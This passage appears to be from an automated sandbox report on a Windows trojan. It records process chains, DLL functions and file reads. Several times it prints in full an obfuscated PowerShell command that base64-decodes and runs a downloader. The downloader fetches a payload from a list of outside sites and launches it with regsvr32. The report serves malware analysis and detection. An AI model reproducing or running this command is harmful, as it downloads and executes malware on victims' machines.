                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018001CF9C16_2_000000018001CF9C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018001EBA016_2_000000018001EBA0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018001B3A416_2_000000018001B3A4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018000D7AC16_2_000000018000D7AC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00000001800053B016_2_00000001800053B0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180015BB816_2_0000000180015BB8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00000001800207BC16_2_00000001800207BC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_000000018000FFC016_2_000000018000FFC0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00000001800173DC16_2_00000001800173DC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_0000000180018BDC16_2_0000000180018BDC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_00C3000017_2_00C30000
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018000641417_2_0000000180006414
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018000C81917_2_000000018000C819
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018001962817_2_0000000180019628
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180025A4C17_2_0000000180025A4C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018001286417_2_0000000180012864
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180005C7417_2_0000000180005C74
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_00000001800248B017_2_00000001800248B0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_00000001800252C017_2_00000001800252C0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180006B2417_2_0000000180006B24
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180006F2C17_2_0000000180006F2C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018000A75817_2_000000018000A758
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018002457017_2_0000000180024570
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018000E99C17_2_000000018000E99C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018001B3A417_2_000000018001B3A4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_00000001800079EC17_2_00000001800079EC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018000940817_2_0000000180009408
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180023C1417_2_0000000180023C14
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018002362417_2_0000000180023624
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018001862817_2_0000000180018628
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018002582C17_2_000000018002582C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180017E2C17_2_0000000180017E2C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018000B83417_2_000000018000B834
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018001763817_2_0000000180017638
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018000403C17_2_000000018000403C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180004E3C17_2_0000000180004E3C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180020E4017_2_0000000180020E40
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018002144417_2_0000000180021444
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018001204417_2_0000000180012044
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018001605417_2_0000000180016054
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018001705C17_2_000000018001705C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180015A6417_2_0000000180015A64
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018001526417_2_0000000180015264
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018000A26C17_2_000000018000A26C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018000187017_2_0000000180001870
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018001F87817_2_000000018001F878
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018000767817_2_0000000180007678
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018001667C17_2_000000018001667C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018001268017_2_0000000180012680
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018001448417_2_0000000180014484
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180001E8817_2_0000000180001E88
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018000968C17_2_000000018000968C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018002229017_2_0000000180022290
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180026A9017_2_0000000180026A90
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018001549417_2_0000000180015494
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018000BC9817_2_000000018000BC98
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018000529C17_2_000000018000529C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180008C9C17_2_0000000180008C9C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180020AA017_2_0000000180020AA0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_00000001800078A417_2_00000001800078A4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018001F0A817_2_000000018001F0A8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180022AAC17_2_0000000180022AAC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018001E4AC17_2_000000018001E4AC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_00000001800048B017_2_00000001800048B0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018001ACB417_2_000000018001ACB4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180007EB417_2_0000000180007EB4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_00000001800090B417_2_00000001800090B4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_00000001800162BC17_2_00000001800162BC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_00000001800270C017_2_00000001800270C0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_00000001800024C017_2_00000001800024C0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_00000001800280C817_2_00000001800280C8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018001AEC817_2_000000018001AEC8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_00000001800050D417_2_00000001800050D4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_00000001800234D817_2_00000001800234D8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018001F6DC17_2_000000018001F6DC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_00000001800026DC17_2_00000001800026DC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180002ADC17_2_0000000180002ADC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018002ACE817_2_000000018002ACE8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_00000001800150F017_2_00000001800150F0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018001E2F417_2_000000018001E2F4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180016AF417_2_0000000180016AF4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018000DEF417_2_000000018000DEF4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018001DEFC17_2_000000018001DEFC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018001250017_2_0000000180012500
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018002410417_2_0000000180024104
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018000630817_2_0000000180006308
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018001370C17_2_000000018001370C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018001A10C17_2_000000018001A10C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180028D1017_2_0000000180028D10
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018002011817_2_0000000180020118
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180004B1817_2_0000000180004B18
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018001A52417_2_000000018001A524
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180015F2417_2_0000000180015F24
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018000F32817_2_000000018000F328
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180002D2817_2_0000000180002D28
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018000E13017_2_000000018000E130
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018002913417_2_0000000180029134
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018000813417_2_0000000180008134
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018002173817_2_0000000180021738
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018002AF3817_2_000000018002AF38
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018002214017_2_0000000180022140
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018002834817_2_0000000180028348
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018000DB4C17_2_000000018000DB4C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180014F5017_2_0000000180014F50
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018000B35017_2_000000018000B350
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018000695417_2_0000000180006954
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018000F55417_2_000000018000F554
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018002975C17_2_000000018002975C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018002B56417_2_000000018002B564
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018001216817_2_0000000180012168
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018001356817_2_0000000180013568
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018002437017_2_0000000180024370
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018000837017_2_0000000180008370
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018001577417_2_0000000180015774
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018001237817_2_0000000180012378
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018001917817_2_0000000180019178
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018002518017_2_0000000180025180
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018000198017_2_0000000180001980
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018002158817_2_0000000180021588
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018001A98817_2_000000018001A988
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018001819017_2_0000000180018190
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018001399417_2_0000000180013994
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180026B9817_2_0000000180026B98
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018002899817_2_0000000180028998
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018001CF9C17_2_000000018001CF9C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018000359C17_2_000000018000359C
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018001EBA017_2_000000018001EBA0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_00000001800061A017_2_00000001800061A0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_00000001800135A617_2_00000001800135A6
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180016DA817_2_0000000180016DA8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_00000001800059AC17_2_00000001800059AC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018000D7AC17_2_000000018000D7AC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_00000001800053B017_2_00000001800053B0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_00000001800135B417_2_00000001800135B4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018001C1B817_2_000000018001C1B8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180015BB817_2_0000000180015BB8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_00000001800025B817_2_00000001800025B8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_00000001800207BC17_2_00000001800207BC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_00000001800085BC17_2_00000001800085BC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_00000001800015C017_2_00000001800015C0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018000FFC017_2_000000018000FFC0
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_00000001800295C817_2_00000001800295C8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_00000001800229CC17_2_00000001800229CC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018000E5D417_2_000000018000E5D4
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_000000018002A5D817_2_000000018002A5D8
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_00000001800173DC17_2_00000001800173DC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180018BDC17_2_0000000180018BDC
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_00000001800261E017_2_00000001800261E0
                  Source: C:\Windows\System32\regsvr32.exeCode function: String function: 00007FFC65CFB3B0 appears 148 times
                  Source: C:\Windows\System32\regsvr32.exeCode function: String function: 00007FFC65CFBD70 appears 113 times
                  Source: C:\Windows\System32\regsvr32.exeCode function: String function: 00007FFC65CF7FF0 appears 31 times
                  Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dllJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: windowscoredeviceinfo.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: windowscoredeviceinfo.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: windowscoredeviceinfo.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: windowscoredeviceinfo.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                  Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /C "powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}""
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                  Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\..\ZtMIjYx\IKdzfJtQpj.BCP
                  Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Users\user\AppData\Local\Temp\..\ZtMIjYx\IKdzfJtQpj.BCP
                  Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\AHWppkeB\tZBUnLQvw.dll"
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\..\ZtMIjYx\IKdzfJtQpj.BCPJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenableJump to behavior
                  Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Users\user\AppData\Local\Temp\..\ZtMIjYx\IKdzfJtQpj.BCPJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\AHWppkeB\tZBUnLQvw.dll"Jump to behavior
                  Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D105A4D4-344C-48EB-9866-EE378D90658B}\InProcServer32Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220523Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_skdzzo1y.zp2.ps1Jump to behavior
                  Source: classification engineClassification label: mal100.troj.evad.win@26/11@2/4
                  Source: C:\Windows\System32\regsvr32.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeCode function: 17_2_0000000180006F2C FindCloseChangeNotification,Process32FirstW,CreateToolhelp32Snapshot,Process32NextW,17_2_0000000180006F2C
                  Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5216:120:WilError_01
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6364:120:WilError_01
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior

                  Data Obfuscation

                  barindex
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}"
